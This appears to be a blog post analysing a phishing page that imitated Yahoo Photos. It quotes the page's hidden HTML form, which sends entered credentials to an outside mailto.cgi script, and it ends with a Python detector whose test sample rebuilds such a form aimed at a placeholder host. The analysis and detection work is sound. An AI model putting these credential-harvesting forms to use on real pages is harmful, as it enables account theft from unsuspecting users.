Recently, I have been getting a lot of messages from people in my Yahoo list, which read something like this:
Strange, I thought. The geocities homepage shows up similar to the Yahoo Photos page, prompting me for a loginid/passwd. I thought something was not right. On downloading the page, and reading through the HTML source, I could see something like this:
< FORM METHOD="POST" ACTION="http://www2
cgi" ENCTYPE="x-www-form-urlencoded"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="firstname.lastname@example.org"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
<INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://photo
On converting the integer values to ASCII characters it looked something like this:
FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
I started Ethereal to check out what data was being transmitted. I used a fake userid and password, and I could see that the credentials were being transmitted to the mailto.cgi form on that website. I think it mails out the credentials to that Gmail id, and once it has a valid password, it would get a list of my contacts and send that malicious message to all of them as well...
An example of "Semantic Attacks".
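The decoding step described above can be automated when triaging a saved page. This is an added example, not code from the original post: it decodes numeric character references in form attributes and reports password forms that post to another host or hide their markup behind such references. The sample page, the host names, the address, and the names `audit` and `FormAudit` are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

def charref(s):
    """Encode every character as a decimal reference (&#NNN;), as the page did."""
    return "".join(f"&#{ord(c)};" for c in s)

# Constructed sample; collector.example and the address are placeholders.
ACTION = "http://collector.example/form/mailto.cgi"
SAMPLE = (
    f'<FORM METHOD="POST" ACTION="{charref(ACTION)}">\n'
    f'<INPUT TYPE="hidden" NAME="Mail_To" VALUE="{charref("drop@collector.example")}">\n'
    '<INPUT TYPE="text" NAME="login"><INPUT TYPE="password" NAME="passwd">\n'
    '</FORM>'
)

class FormAudit(HTMLParser):
    def __init__(self, expected_host):
        super().__init__()
        self.expected_host = expected_host
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)                  # values arrive with &#NNN; already decoded
        raw = self.get_starttag_text()   # original markup, still encoded
        if tag == "form":
            host = urlparse(a.get("action") or "").hostname
            self.forms.append({
                "action": a.get("action"),
                "off_site": host is not None and host != self.expected_host,
                "encoded": bool(re.search(r"&#x?[0-9a-f]+;", raw, re.I)),
                "password": False,
                "hidden": {},
            })
        elif tag == "input" and self.forms:
            form = self.forms[-1]
            kind = (a.get("type") or "text").lower()
            if kind == "password":
                form["password"] = True
            elif kind == "hidden":
                form["hidden"][a.get("name")] = a.get("value")

def audit(html, expected_host):
    """Return password forms that post off-site or obfuscate the <form> tag."""
    parser = FormAudit(expected_host)
    parser.feed(html)
    parser.close()
    return [f for f in parser.forms if f["password"] and (f["off_site"] or f["encoded"])]

if __name__ == "__main__":
    for finding in audit(SAMPLE, "login.example"):
        print(finding)
```

A relative `action` has no host and is treated as same-site, so only absolute off-site targets and encoded `<form>` tags are reported.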